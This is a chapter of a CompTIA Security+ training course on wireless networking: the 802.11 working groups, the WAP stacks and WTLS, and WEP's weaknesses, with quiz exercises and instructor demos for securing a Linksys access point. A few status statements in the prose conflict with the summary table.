                     through “j.” The four most prominent of these groups have been 802.11b, 802.11a,
                     802.11i, and 802.11g.
                     Some of these working groups have already approved new standards, others are still
                     working, and two others, 802.11c and 802.11j, have been respectively folded into
                     another working group or disbanded. Two other 802 working groups, 802.15 (covering
                     wireless personal area networks or Wireless PANs) and 802.16 (covering wireless
                     metropolitan area networks or Wireless MANs), are also working on wireless standards.
                     These standards are only briefly mentioned since they are not covered on the exam.
                                                Wireless and instant messaging       8–3

802.11a
The IEEE approved the 802.11a standard in 1999 and titled it “High-speed Physical
Layer in the 5 GHz Band.” This standard sets specifications for an additional type of
data transmission at the Physical layer—the Coded Orthogonal Frequency Multiplexing
(COFDM) protocol.
The COFDM layer provides data transmission rates of 6, 9, 12, 18, 24, 36, 48, and 54
Mbps—a major improvement over the 5.5 Mbps or 11 Mbps offered by 802.11b. The
radios consist of either wireless NIC cards or wireless access points (APs), and they
operate by converting the digital and analog signals between the client and the wired
network. Communications are established at the fastest possible data rate, which is
dependent upon the distance between the client and network and the strength of the
signal.
One major benefit of operating in the 5 GHz band is that 802.11a devices do not have to
compete with many other devices, such as cordless phones, microwave ovens, and baby
monitors (though baby monitors are usually not a problem in a corporate environment).

802.11b
The 802.11b standard was approved in 1999, concurrently with 802.11a. The IEEE
named the 802.11b standard the “Higher-Speed Layer Extension in the 2.4 GHz Band.”
The IEEE also established specifications for an additional type of data transmission at
the Physical layer—the High-Rate Direct Sequence Spread Spectrum (HR/DSSS)
protocol. This protocol allows for data transmission at either 5.5 Mbps or 11 Mbps
(which is as fast as standard Ethernet and much faster than most Internet connections)
instead of the mandatory 1 Mbps or the optional 2 Mbps data transmission rate offered
by the original 802.11 standard. In 2001, the 802.11b standard came under heavy
criticism because of security flaws in WEP.
The Wireless Ethernet Compatibility Alliance (WECA), an equipment testing and
certification group, created a standard based on 802.11b that is dubbed “Wi-Fi,” a
trademark that is short for wireless fidelity.

802.11c
The IEEE working group C was responsible for creating 802.11c, which would develop
MAC bridging functionality. This group was folded into the 802.1D standard.
802.1D is focused on MAC bridging in wired LANs and should not be confused with
802.11d.

802.11d
The IEEE working group D is responsible for determining the requirements necessary
for 802.11 to operate in other countries and incorporating those requirements into
802.11d. The work of this group continues.
8–4   CompTIA Security+ Certification

                 802.11e
                 The IEEE working group E is responsible for creating the 802.11e standard, which will
                 add multimedia and Quality of Service (QoS) capabilities to the MAC layer and
                 therefore guarantee specified data transmission rates and error percentages. This
                 proposal is still in draft form. When this work is completed, it will have a beneficial
                 affect on 802.11a, 802.11b, and 802.11g. The 802.11e standard will also impact 802.15,
                 which is assigned the task of creating wireless personal area networks (Wireless PANs),
                 and 802.16, which is assigned the task of creating Wireless MAN standards. Without an
                 improvement in QoS, many of the benefits of higher rates of data transmission, such as
                 video streaming and wireless Voice over IP (wireless VoIP), will not materialize.

                 802.11f
                 The IEEE working group F is responsible for creating the 802.11f standard, which will
                 allow for better roaming between multivendor access points and distribution systems
                 (different LANs within a WAN) than is currently feasible under 802.11.

                 802.11g
                 The IEEE working group G created a draft 802.11g standard, was approved in June
                 2003. This standard offers a raw data throughput rate of up to 54 Mbps—five times
                 higher than 802.11b. The 802.11g specification is backward compatible with the widely
                 deployed 802.11b standard.

                 802.11h
                 The IEEE working group H is responsible for creating 802.11h, which is required to
                 allow for European implementations requests regarding the 5 GHz Physical layer. Two
                 requirements of this standard are that it limits the PC card from emitting more radio
                 signal than is needed and allows devices to listen to radio wave activity before picking a
                 channel on which to broadcast. This standard was approved in 2003.

                 802.11i
                 The IEEE working group I is responsible for fixing the serious security flaws in
                 WLANs by developing new security standards. This standard was approved in 2004,
                 however, it’s apparent that its initial medium-term intent was to create a new standard
                 that would be at least somewhat backward compatible with the original WEP so that a
                 total transformation of existing equipment need not be necessary. This fix will probably
                 involve increasing the number of required bits in the temporal keys to 128, the use of
                 fast packet keying, and key management.
                 In the long term, the working group hopes to eliminate WEP altogether and replace it
                 with what it is calling the Temporal Key Integrity Protocol (TKIP), which would require
                 that keys be replaced within a certain amount of time. As discussed in the WEP section
                 of this unit, WEP does not currently require these keys be replaced at all.
                                                        Wireless and instant messaging           8–5

802.11j
The IEEE working group J "Wireless LAN Medium Access Control (MAC) and
Physical Layer (PHY) Specifications: 4.9 to 5 GHz Operation in Japan" addresses
Japanese government regulations regarding the use of Wireless LANs in the 4.9 and 5
GHz bands in indoor hot spot, fixed outdoor, and nomadic or mobile modes. This was
approved in November 2004.
A summary of IEEE 802.11 working groups is provided in the following table:

 Working group       Primary task                                           Status of work

 802.11a             Worked to establish specifications for wireless data   Approved 1999
                     transmissions in the 5 GHz band

 802.11b             Worked to establish specifications for wireless data   Approved 1999
                     transmission in the 2.4 GHz band

 802.11c             Worked to establish wireless MAC bridging              Folded into 802.1D
                     functionality

 802.11d             Working to determine requirements that will allow      Approved 2001
                     802.11 to operate outside the United States

 802.11e             Worked to add multimedia and Quality of Service        Approved 2005
                     (QoS) capabilities to wireless MAC layer

 802.11f             Worked to allow for better roaming between             Approved 2003
                     multivendor access points and distribution systems

 802.11g             Worked to provide raw data throughput over             Approved 2003
                     wireless networks at a rate of up to 54 Mbps

 802.11h             Worked to allow for European implementation            Approved 2004
                     requests regarding the 5 GHz band

 802.11i             Worked to fix security flaws in WLANs by               Approved 2004
                     developing new security standards

 802.11j             Worked to address meeting Japanese government          Approved 2004
                     requirements for 4.9 to 5 GHz band use.


The IEEE is dealing with all of the technology issues that arise as it tries to set standards
for wireless data transmission and processing. At some point, all of these groups will
have completed their work, and other challenges will arise that need to be dealt with as
time goes on.
8–6      CompTIA Security+ Certification

Do it!              A-1:      Discussing IEEE 802.11 protocol
                      Questions and answers
                       1 The IEEE work groups were named in sequential alphabetical order from which
                         of the following? (Choose all that apply.)
                          A    a through f
                          B    a through i
                          C    a through j
                          D    a through m

                       2 Which of the following are physical layers as defined by 802.11 protocols?
                          A    DSSS
                          B    COFDM
                          C    FHSS
                          D    Diffused infrared
                          E    MAC

                       3 Which of the following data transmission rates does 802.11b support? (Choose all
                         that apply.)
                          A    1 Mbps
                          B    5.5 Mbps
                          C    10 Mbps
                          D    11 Mbps
                          E    54 Mbps

                       4 The 802.11g protocol will offer throughput rates of up to _______.
                          A    10 Mbps
                          B    22 Mbps
                          C    54 Mbps
                          D    128 Mbps

                       5 Which of the following working groups is responsible for fixing the security flaws
                         in WLANs?
                          A    802.11j
                          B    802.11i
                          C    WAP Forum
                          D    802.1x
                          E    802.11g
                                                                             Wireless and instant messaging          8–7

Do it!                         A-2:   Creating a wireless network (demonstration only)
                                Here’s how                             Here’s why
Introduce this activity as a    1 Connect the Category 5 Ethernet      The first step in creating a wireless network is to
demonstration. Students           network cable to the Linksys         install and configure the router or wireless
should observe only.                                                   access point (WAP). In this activity, you’ll use a
                                  WAP11 Access Point
                                                                       Linksys WAP11 Wireless Access Point to
                                                                       connect wireless devices.

                                                                       The Linksys WAP11 is initially installed from
                                                                       CD and can then be configured through a
                                                                       browser.

                                2 Connect the other end of the cable   The Access Point is now connected to your
                                  to the classroom switch or hub       10/100 network.

                                3 Connect the AC Adapter to the        To avoid damage to your unit, only use the
                                  WAP11 power port and to an           power adapter supplied with the Access Point.
                                  electrical outlet

Use the Instructor’s PC to      4 At the laptop PC, insert the         The Welcome Screen appears.
demonstrate the                   Linksys Setup Wizard CD in the
installation procedure.                                                If the autorun program does not start, choose
                                  CD-ROM drive
                                                                       Start, Run, and enter D:\setup.exe (if D: is your
                                                                       PC’s CD-ROM drive).

                                5 Click Setup




                                                                       The Connecting the Wireless Access Point
                                                                       screen appears.

                                6 Click Next
8–8   CompTIA Security+ Certification


                    7 Click Next                         The initial Setup screen appears.




                       Click Yes                         (To change the settings.) The system prompts
                                                         for a password.

                    8 In the Password field, enter the
                      default password, admin




                       Click OK

                    9 Change the IP Address and the      (If necessary to conform to the classroom setup.)
                       Subnet Mask                       The IP Address must be unique to your network.

                       Change the AP Name                You can assign any unique name to the Access
                                                         Point.




                       When finished, click Next         The Basic Settings screen appears.

                  10 In the SSID field, type SEC-
                       CLASS




                                                         Changing the SSID field from the default is
                                                         important in order to protect the LAN from
                                                         intrusion.

                       Click Next
                                           Wireless and instant messaging        8–9

11 Click Next                         (To continue through the Security (Optional)
                                      screen.) The Confirm Your Network Settings
                                      screen appears.

12 Review your settings, then click
   Yes




                                      Your changes are saved.

   Click Exit                         (To complete the basic setup.) The Access Point
                                      is now configured for the classroom network.
8–10      CompTIA Security+ Certification


Topic B: WAP 1.x and WAP 2.0
                     This topic covers the following CompTIA Security+ exam objective:

                      #      Objective

                      2.6    Recognize and understand the administration of the following wireless technologies and
                             concepts
                              • WEP / WAP (Wired Equivalent Privacy / Wireless Application Protocol)
                              • WTLS (Wireless Transport Layer Security)




                     The WAP protocol
Explanation          The Wireless Application Protocol (WAP) is an open, global specification that is
                     designed to deliver information and services to users of handheld digital wireless
                     devices, such as mobile phones, pagers, personal digital assistants (PDAs), smart
                     phones, and two-way radios. It’s designed to be compatible with most wireless networks
                     including CDPD, CDMA, DataTAC, DECT, FLEX, GPRS, GSM, iDEN, Mobitex,
                     PDC, PHS, TETRA, TDMA, and ReFLEX. WAP can be built on any operating system
                     including PalmOS, EPOC, Windows CE, FLEXOS, OS/9, and JavaOS.
                     WAP was developed by the WAP Forum to provide open protocol specifications to
                     enable access to the Internet across different transport options and on many devices. The
                     WAP Forum was founded in 1997 by Unwired Planet (now Phone.com), Ericsson,
                     Motorola, and Nokia. The WAP Forum no longer exists as an independent organization.
                     The Open Mobile Alliance (OMA) now includes the WAP work
                     (www.openmobilealliance.org/tech/affiliates/wap/wapindex.html). The
                     WAP Forum is not a standards body, as is the IEEE, but it does work closely with
                     standards bodies such as the IEEE, W3C, ETSI, TIA, and AMIC. The WAP Forum
                     currently has a member list of over 230 companies, made up of handset manufacturers,
                     carriers, software developers, and other companies. Its board of directors comprises
                     industry representatives from Motorola, Sprint PCS, Ericsson, IBM, Intel Corporation,
                     Microsoft, NEC Corporation, Nokia, NTT DoCoMo, Sun Microsystems, Texas
                     Instruments, Vodafone, and others. Like the IEEE, the WAP Forum has formed various
                     working groups to focus on different aspects of wireless data communication and
                     mobile commerce (m-commerce).
                     The WAP Forum was formed in the middle of a meteoric rise in the use of mobile
                     phones and the Internet. As the major mobile phone companies saw their markets start
                     to saturate, particularly in Europe and Asia, they realized that, if they were to continue
                     their rapid growth, they would need to add new features and services to their phones.
                     The idea of bringing the Internet to handheld devices was very appealing. Unlike
                     traditional Internet users that view content-rich Web material on large screens using
                     computers equipped with high-speed processors, large amounts of memory, and
                     keyboards over telephone and high-bandwidth access lines such as cable and T1 lines,
                     mobile device users would be constrained by the need to use handheld devices. As
                     shown in Exhibit 8-1 and Exhibit 8-2, these devices have very small viewer screens,
                     clumsy user interfaces (only number keys in the case of a mobile phone), much slower
                     processors, limited memory, and much lower bandwidth (typically only 9600 bps).
                     In order for mobile device users to gain access to the Internet, significant changes
                     needed to be made.
                                            Wireless and instant messaging   8–11




Exhibit 8-1: Sanyo Sprint SCP-6000 – WAP-enabled phone




Exhibit 8-2: Handspring Treo 270 – WAP-enabled communicator
8–12   CompTIA Security+ Certification

                  The WAP 1.x stack
                  Like data transmissions between wired network devices, wireless devices need to be
                  able to communicate with data sources over a network. With the slow processor speeds
                  of handheld devices and the latency caused by limited bandwidth, the WAP Forum
                  needed to modify the OSI Model and create its own set of protocols called the WAP
                  stack.
                  Once you have an understanding of the components of the WAP stack, you can discuss
                  how a WAP-capable client (usually a wireless phone, communicator, or PDA) requests
                  and receives information over the Internet.

                  Comparison to the OSI model
                  WAP 1.x was based as closely as possible on the OSI Model so it could interact with the
                  Internet, but there are some significant differences between the two.
                  The following table compares the WAP 1.x stack to the OSI stack. Notice these layers
                  do not correspond exactly together and that the table is simply a conceptual tool to help
                  you understand some of the similarities and differences between the two models.
                  Some of the most notable differences are:
                      • There are five layers in the WAP 1.x stack that would lie within the top four (of
                        seven) layers of the OSI Model.
                      • The transaction and security layers of the WAP 1.x stack are new. (Although
                        one could conceptually place SSL and TLS here, those protocols are actually
                        Session and Application layer protocols in the OSI model.)
                      • No network layer exists, as WDP at the Transport layer performs many of these
                        functions in combination with the Bearer protocols.
                  WAP is much leaner than the OSI Model in that each of its protocols has been created
                  to make data transactions as compressed as possible and to allow for many more
                  dropped packets than the OSI Model.

                   Layer             WAP 1.x                                OSI/Web

                   Application       Wireless Application Environment       HTML, JavaScript, and others
                                     (WAE)

                   Session           Wireless Session Protocol (WSP)        HTTP

                   Transaction       Wireless Transaction Protocol (WTP)

                   Security          Wireless Transport Layer Security      SSL/TLS
                                     (WTLS)

                   Transport         Wireless Datagram Protocol (WDP)       TCP/IP, TCP/UDP

                   Lower layer(s)    Bearers (GPRS, TDMA, CDMA, and         IP, Data Link layer, Physical layer
                                     so on)
                                                  Wireless and instant messaging    8–13

These protocols were based on the International Organization for Standardization OSI
Model, but were different enough from it to require that data communications between
clients (wireless devices) and servers pass through a WAP gateway, which in effect
converts the data from one type of network protocol to another.
    • The Wireless Application Layer (WAL) corresponds to the HTML layer, but
        unlike the HTML layer, which allows for a wide variety of content formats that
        can consume large amounts of processing power and be displayed on large
        computer screens, WAE was designed only to specify lightweight formats, such
        as text and image formats, and to leave decisions related to browser types,
        phonebooks, and the like to device vendors.
    • The Wireless Session Protocol (WSP) provides connection- and connectionless-
      oriented session standards that require a relatively limited amount of information
      exchanges between the wireless device and the server compared to the number
      of information exchanges required between a wired device and the server.
    • Connection-oriented session services that require reliable data transmission
      operate over the Wireless Transaction Protocol (WTP) layer while
      connectionless-oriented session services operate over the Wireless Datagram
      Protocol (WDP). The WTP operates over the WDP or the optional WTLS layer.
      This layer allows for either reliable or unreliable transactions and, like other
      WAP 1.x layers, has been designed to limit the number of transactions necessary
      to allow data transport, relative to the number of transactions necessary in the
      OSI/Web stack.
    • The Wireless Datagram Protocol (WDP) is the bottom layer above the carrier
      layer. WDP differs greatly from the UDP layer of the OSI/Web stack in that it
      allows operability of a great variety of mobile networks while the UDP layer
      must operate over an IP network.
Another significant difference between wireless and wired data transfer lies in the
network architectural structures of the two network types. Exhibit 8-3 illustrates the
differences between a WAP network and a wired network’s architecture.




Exhibit 8-3: WAP vs. wired network
8–14   CompTIA Security+ Certification

                  WAP 1.x security
                  To gain access to information on the application server, the WAP client (a WAP-
                  enabled mobile phone, PDA, and so forth) must take the following steps:
                      1 The client first makes a connection with the WAP gateway and then sends a
                         request for the content that it wants using WSP. (WSP is similar to HTTP, but its
                         overhead is much smaller than that of HTTP.)
                      2 The gateway then converts the request into the HTTP format and forwards it to
                         the application server.
                      3 The application server then sends the requested content back to the WAP
                         gateway.
                      4 The gateway converts the data using WSP, compresses it, and sends it on to the
                         WAP client.
                  If the WAP client has enabled the Wireless Transport Layer Security (WTLS) protocol
                  (the WAP security protocol discussed shortly), then the data is encrypted between the
                  WAP client and the WAP gateway.
                  WAP 1.x does not require the use of WTSL. If it is not enabled, then all of the data is
                  transmitted to and received from the WAP gateway in plaintext. WAP 2.0 employs TLS
                  rather than WTLS so no conversion is necessary.
                  The data is also encrypted using the Transport Layer Security (TLS) protocol, however,
                  while the WAP gateway is converting the data from WSP to HTTP, and vice versa,
                  there is a brief instant—milliseconds—when the data is not encrypted at all. This
                  moment is referred to as the WAP gap, and it has raised a lot of criticism for WAP in
                  the past year or so. Financial services companies were particularly concerned by this
                  flaw, and many of them chose to set up their own WAP gateways to ensure they had
                  adequate control over who had access to the data while it was in plaintext.
                  The possibility of anyone being able to capture this data and use it maliciously is quite
                  small, but there is still a risk. A hacker would have to have physical access to the WAP
                  gateway, which is usually located within secure premises to ensure that billing
                  information is kept secure. In addition, a hacker would have to sift through all of the
                  traffic pouring through the gateway at an exact moment. Adding to the difficulty is the
                  fact that packets passing through the WAP gateway are never saved, even briefly, in any
                  type of storage mechanism. The whole transaction takes place in flash memory.
                                                       Wireless and instant messaging   8–15

Do it!   B-1:   Discussing WAP 1.x
          Questions and answers
          1 The WAP 1.x stack Security layer is similar to which of the following?
            A    SSL/TLS
            B    HTML
            C    TCP
            D    IP

          2 The WAP 1.x lower layer is similar to what layers of the OSI Model? (Choose all
            that apply.)
            A    IP
            B    Data link
            C    Physical
            D    Security

          3 WAP is a proprietary encryption protocol that was created by WECA. True or
            false?

            False: It was created by the WAP Forum.

          4 Where does the WAP gap occur?
            A    In the WAP client
            B    In the WAP gateway
            C    Between the WAP client and the application server
            D    Between the WAP gateway and the application server
            E    None of the above
8–16          CompTIA Security+ Certification

                         The Wireless transport layer security protocol
Explanation              In addition to security threats posed by the WAP gap, there have also been a number of
                         proven attacks publicized about the Wireless Transport Layer Security (WTLS) protocol
                         that WAP 1.x employs. Before these flaws are discussed, however, you should
                         understand what WTLS is and how it works.
                         WTLS was designed to provide authentication, data encryption, and privacy for WAP
                         1.x users. As mentioned, mobile devices have much less memory, computational
                         resources, and battery power than traditional computers. They also experience much
                         greater latency (the time it takes for the data to arrive and be processed) because they
                         send and receive data at a much, much slower rate than computers. If you were using
                         9600-baud modems back in the early to mid-1990s, perhaps you remember how long
                         you had to wait for a Web page to download. That is about where data transmission
                         rates are now for mobile devices. For these reasons, the WAP Forum chose to develop a
                         scaled-down version of TLS that does not require as much processing power, memory,
                         or battery life.

                         Authentication
                         WTLS allows for three different classes of authentication:
                             • Class 1 authentication is anonymous and does not allow either the client or the
                               gateway to authenticate the other.
                             • Class 2 authentication only allows the client to authenticate the gateway.
                             • Class 3 authentication allows both the client and the gateway to authenticate
                               each other.
                         Class 3 authentication requires the use of a Wireless Identity Module (WIM). A WIM is
                         a tamper-resistant device, such as a smart card, that facilitates the storage of digital
                         signatures and can also perform more advanced cryptography with its enhanced
                         processing power.
                         The WTLS protocol completes Class 2 authentication in four steps, as shown here:
                            1 Prior to sending a request to open a session with the WAP gateway, the WAP
                              device sends a request for authentication. It’s always the client that begins this
                              process, never the WAP gateway. The client can also challenge the gateway
                              again at any time during the session.
                              Both TLS and WTLS differentiate between a connection and a session. A
                              session can exist over many connections. This is especially helpful in wireless
                              communications because connections are not as stable as they are in the wired
                              world. If a connection is broken, the session can continue using the same
                              security mechanisms that were initially established, but it’s up to the gateway (or
                              server in the case of TLS) to decide whether or not to create a new session with
                              new security parameters.
                            2 The gateway responds and then sends a copy of its certificate, which contains
                              the gateway’s public key, to the WAP device.
                            3 The WAP device then receives the certificate and public key and generates a
                              unique random value.
                            4 The WAP gateway then receives the encrypted value and uses its own private
                              key to decrypt it.
                                                 Wireless and instant messaging    8–17

This process works quickly, and requires less overhead, largely because WTLS is using
weaker keys than TLS, which does not require very much processing time. Remember
that in WAP 1.x, WTLS is optional, so it might not even be turned on, and it only
encrypts data between the client and the WAP gateway. The WAP gap is still present
between the time the gateway has finished decrypting the data and when it encrypts it
with TLS before sending it to the application server.

SSIDs
Another area of concern is the unsafe use of service set identifiers (SSIDs). SSIDs are
wireless network names, which are sent with wireless data packets to help devices
identify each other in a wireless network. The default SSID values should never be
used, nor should SSIDs that help unscrupulous hackers with sniffers to identify your
WLAN. These would include such SSIDs as “12th Street Branch Accounting
Department” or “ABC Consulting Firm.” Giving your wireless devices more cryptic
SSIDs help reduce the likelihood that a hacker will be able to compromise your
WLAN(s).

Weak encryption keys
The weak key used by WTLS has been widely criticized. Some WAP supporters have
responded to these criticisms by arguing that the shortcuts taken in WTLS were
necessary in order for WAP to adapt to the wireless environment. These weaknesses are
real and should be considered when transmitting sensitive information using a WAP-
enabled device.
Although many vendors have already made improvements to WAP 1.x-enabled devices
with higher levels of encryption and more efficient processing, it cannot be emphasized
enough that WTLS cannot be taken for granted even if the vendor has made these
improvements, or even if they simply state that their application incorporates WTLS.
8–18   CompTIA Security+ Certification

                  The WAP 2.0 stack
                  In January 2002, the WAP Forum released the “Wireless Application Protocol (WAP
                  2.0) Technical White Paper.” This paper specified a new suite of utilities and security
                  enhancements. One of these security enhancements was the release of a new WAP stack
                  that eliminates the use of WTLS and instead relies on a lighter version of TLS, the
                  same protocol used on the common Internet stack, which allows end-to-end security and
                  avoids any WAP gaps.
                  In response to the emergence of higher-speed wireless networks, all of the other layers
                  of WAP 1.x are also replaced by standard Internet layers, which will make wireless data
                  transactions much more efficient. WAP 2.0 still supports the WAP 1.x stack in order to
                  facilitate legacy devices and systems. A comparison of the WAP 1.x and WAP 2.0
                  stacks is provided in Exhibit 8-4.




                  Exhibit 8-4: A comparison of WAP 1.x and 2.0 stacks

                  In addition to these changes, WAP 2.0 has added a number of features. These include,
                  but are not limited to:
                      • WAP Push — Allows content providers to send information, such as stock
                        prices and advertisements, directly to the WAP device without being requested
                        to do so.
                      • User agent profile — Allows a way to capture and communicate WAP device
                        capabilities and user preferences.
                      • Wireless Telephony Application — Provides a range of advanced telephony
                        applications including such call-handling services as making, answering,
                        placing, or redirecting calls.
                      • External Functionality Interface (EFI) — Allows the use of plug-and-play
                        modules to extend the features of the client’s applications. It also allows the
                        addition of smart cards, GPS devices, health care devices, and digital cameras.
                      • Multimedia Messaging Service (MMS) — Provides a framework to enable a
                        richer messaging solution.
                                                            Wireless and instant messaging      8–19

Do it!   B-2:   Discussing WTLS protocol and WAP2.0
          Questions and answers
          1 WTLS’s Class 2 authentication only allows the client to authenticate the gateway.
            True or false?

            True

          2 WTLS’s Class 3 authentication requires the use of a tamper-resistant device called
            a ________________________________________.

            Wireless Identity Module (WIM)

          3 Put the steps below in the correct sequence to describe a Class 2 authentication.

            ___ The client generates a unique random value and encrypts it with the             3
            public key.

            ___ The gateway sends a copy of its certificate containing its public key.          2

            ___ The client sends a request for authentication to the gateway.                   1

            ___ The gateway decrypts the encrypted value with its private key.                  4

          4 What are SSIDs?

            SSIDs are wireless network names, which are sent with wireless data packets to help devices
            identify each other in a wireless network.

          5 WAP 2.0 uses which of the following as its security protocol?
            A      TCP
            B      SSL
            C      TLS
            D      WTLS
            E      STP
8–20          CompTIA Security+ Certification

Do it!                         B-3: Controlling access to the WAP (demonstration only)
                                Here’s how                             Here’s why
Introduce this activity as a    1 From the Instructor’s computer,      The Access Point is designed to be functional
demonstration. Students           open Internet Explorer               right out of the box. To implement greater
should observe only.                                                   security on your wireless network, you will use
Steps 1-13 should be                                                   Linksys’s Web-based configuration utility.
done on the Instructor’s
computer.
                                2 In the Address field, enter          (For example, http://192.168.1.251.) The system
                                  http:// followed by the IP           prompts you for a user name and password.
                                  Address of your Linksys WAP

                                3 Leave the user name blank

                                  In the Password field, enter
                                  admin

                                  Click OK                             The configuration utility with the Setup tab
                                                                       active appears. This tab allows you to change
                                                                       the Access Point’s general settings.

                                4 Review the settings but leave the AP Name, LAN IP Address, and AP Mode
                                  settings at their default values




                                  The AP Name and LAN IP Address were set during the initial setup.




                                  The AP Mode is set to Access Point by default. This connects your wireless PCs
                                  to a wired network.
                                              Wireless and instant messaging      8–21

   To communicate with another Wireless Access Point, you have two options: (1) If
   within the same network, choose Access Point Client. This will make this WAP a
   client to the other WAP. (2) If you want to connect two networks together, select
   Wireless Bridge. This will make the connection to another access point set as a
   wireless bridge. In both cases, you would specify the other WAP MAC address.

   To connect three or more networks together, choose Wireless Bridge-Point to
   MultiPoint.

 5 Activate the Password tab




 6 Enter a new password

   Re-enter the new password to         To avoid using the default password. Be sure to
   confirm                              choose a complex password.

 7 Click Apply                          To save the change.

 8 Enter the new password and click     To return to the utility
   OK

 9 Activate the Advanced tab




                                        The Filter tab appears.

                                        One method of restricting wireless devices is to
                                        create a list of approved users. A list of
                                        preapproved media access control (MAC)
                                        addresses can be entered into the Filtered MAC
                                        Address table in the access point. Only those
                                        stations on the ACL will be provided
                                        admittance. The Linksys WAP11 provides an
                                        option to create and manage an ACL.

10 Select Enabled


                                        Filtering is enabled.
8–22         CompTIA Security+ Certification


                             11 Select Only deny PCs with           This will set the MAC Address list to deny listed
                                MAC listed below to access          PCs.
                                device
                                                                    The software allows up to 50 MAC Addresses to
                                                                    be specified. If you need to enter more than 10,
                                                                    click on the pull-down menu above the MAC
                                                                    Address fields.

                             12 In the MAC 01 field, enter the      Do not use dashes as you enter the address.
                                MAC Address of the wireless
                                adapter in the computer with the    The MAC Address can be obtained by running
                                wireless adapter (laptop or         ipconfig /all on the PC’s command
                                desktop)                            screen.

                             13 Click Apply                         To save the changes. Notice that you'll see a
                                                                    Continue button; it's not necessary to click
                                                                    Continue; the program will return to the
                                                                    previous page automatically.

This step and the next are   14 From the computer with the listed
done on the computer with       MAC Address, load Internet
the wireless network
adapter.                        Explorer

                             15 Enter the IP Address of the WAP     The page fails to load.
                                in the Address field

This step is done on the     16 On the Filters tab on the
instructor’s computer.          Instructor’s PC, select Only
                                allow PCs with MAC listed
                                below to access device

                                In the MAC 01 field, enter the
                                MAC Address of the wireless
                                adapter in the computer with the
                                wireless adapter

                                Click Apply

This step and the next are   17 From the computer with the listed   The page successfully loads.
done on the computer with       MAC Address, retry to access the
the wireless network
adapter.                        WAP using its IP Address
                                                                                    Wireless and instant messaging          8–23


Topic C: Wired equivalent privacy
                            This topic covers the following CompTIA Security+ exam objective:

                             #     Objective

                             2.6   Recognize and understand the administration of the following wireless technologies and
                                   concepts
                                    • WEP / WAP (Wired Equivalent Privacy / Wireless Application Protocol)
                                    • Vulnerabilities
                                        Site Surveys




                            Introducing WEP
Explanation                 Wired Equivalent Privacy (WEP) is the optional security mechanism that was specified
                            by the 802.11 protocol to provide authentication and confidentiality in a wireless LAN
                            (WLAN) environment. Even though the IEEE committee recommended that WEP
                            should be used, it also stated that WEP should not be considered adequate security and
                            strongly recommended that it should not be considered without also implementing a
                            separate authentication process and providing for external key management. Before
                            delving into WEP, however, you must first gain an understanding of what a WLAN is
                            and how it operates.
                            A WLAN works to connect clients to network resources using radio signals to pass data
                            through the atmosphere, as depicted in Exhibit 8-5.



Review with students the
operation of a typical
wireless LAN as
depicted here. Notice
that critical resources,
such as servers and
internetwork devices,
are still connected using
wired technologies so
WLANs are frequently
really hybrids that
incorporate both wired
and wireless
components.




                            Exhibit 8-5: Conceptual diagram of wireless LAN
8–24   CompTIA Security+ Certification


                  In order to do this, it employs wireless access points (AP), as shown in Exhibit 8-6,
                  which are connected to the wired LAN and act as radio broadcast stations that transmit
                  data to clients equipped with wireless network interface cards (NICs), as shown in
                  Exhibit 8-7.




                  Exhibit 8-6: Netgear ME 102 802.11b Access Point




                  Exhibit 8-7: 3 Com AirConnect wireless NIC

                  This allows users to stay connected to the network as they move around from place to
                  place within and between the broadcast zones of the various access points (APs) within
                  the WLAN. WLANs use WEP to encrypt and guarantee the integrity of the data passed
                  between the client and the AP and to authenticate clients that are requesting network
                  resources.

                  How WEP works
                  WEP uses a symmetric key (a shared key) to authenticate wireless devices (not wireless
                  device users) and to guarantee the integrity of the data by encrypting the transmissions.
                  Each of the APs and clients needs to share the same key in order for this to happen
                  effectively.
                  When a client wants to send data to or request resources from the network, it sends a
                  request to the AP asking for permission to access the wired network. If WEP has not
                  been enabled, and by default it is not, then the AP allows the request for resources to
                  pass through to the wired LAN. If WEP has been enabled, then the client begins a
                  challenge-and-response authentication process.

                  WEP’s weaknesses
                  WEP has been criticized for having many problems, including problems related to the
                  initialization vector (IV) that it uses to encrypt data and ensure its integrity, and also
                  problems with how it handles keys.
                                                 Wireless and instant messaging   8–25

Initialization vector concerns
An IV is a sequence of random bytes that have been appended to the front of the data,
which is in plaintext before encryption. There are several problems with the IV:
   • WEP sends the IV in plaintext across the WLAN and, therefore, it can be picked
       up by a hacker along the way.
    • The WEP IV is only 24-bits long, which means that it can only take 224
      (16,777,216) values.
    • The IV is reused on a regular basis. An individual could capture packets and see
      the pattern of reuse, thus revealing the IV. Researchers have actually broken the
      128-bit WEP encryption in as little as two hours using this method.
In August 2001, Fluhrer, Mantin, and Shamir published a paper titled “Weaknesses in
the Key Scheduling Algorithm of RC4.” In it, they described an attack that could be
made using weak keys created by WEP’s IV. They also criticized the fact that the RC4
stream cipher, though effective in many other instances, is rendered useless in WEP
because it encrypts messages by concatenating a fixed secret key and known IV
modifiers.

Key sharing
Others have criticized WEP for not requiring asymmetric authentication in which each
wireless device would employ its own secret key. At this point, every wireless device in
a WLAN shares a common secret key, which means the likelihood of that key getting
into the hands of someone who wishes to harm the organization is increased.
For example, standard WEP requires the secret keys be manually configured. Rational
security implementation then dictates the secret key be changed on every device every
time someone leaves the company, if not more frequently, but this would be an
administrative nightmare in large organizations. A symmetric key system, in itself, does
not do anything to protect critical information from authorized WLAN members who
can, intentionally or unintentionally, gain access to resources to which they are not
authorized access. Another weakness related to the difficulty associated with rekeying is
that if it is not done regularly, hackers have even more time to break into the system.

War driving and other issues
In addition to the WEP related problems that have been discussed so far, wireless LANs
have other security holes. For example, WLAN transmissions can, and often do, extend
beyond the confines of the physical structures of the organizations that use them, unlike
wired LANs, it’s much, much easier for people to detect and capture them. Several
articles, in such widely read publications as PC Magazine and the Wall Street Journal,
describe the amount of information about an 801.11b WLAN that can be collected
through war driving.
War driving involves driving around using a laptop equipped with a wireless card and
an antenna. Craig Ellison wrote an article for PC Magazine in 2001 that described how
he was able to use this method to detect 61 APs within a six-block radius of the Ziff
Davis office in Manhattan. Of these, only 21% of the networks had actually enabled
WEP. The other 79% were broadcasting their transmissions out in plaintext for anyone
to pick up. On other war driving trips through Jersey City, Boston, and the Silicon
Valley, Ellison easily found 808 networks and only 38% of them were using WEP.
8–26   CompTIA Security+ Certification

                  In addition to war driving, which is a fairly passive activity, unauthorized users can
                  attach themselves to WLANs and use their resources, set up their own access points,
                  and jam the network in a denial-of-service attack, or use the previously mentioned WEP
                  weaknesses to break into wired LANs by attaching themselves to WLANs that are not
                  separated from the wired LAN by a DMZ. WEP authenticates clients, not users. Unless
                  an additional security method is employed, such as requiring users to provide
                  username/password sets, anyone who gains access to a client that has the shared key is
                  able to break into the system.
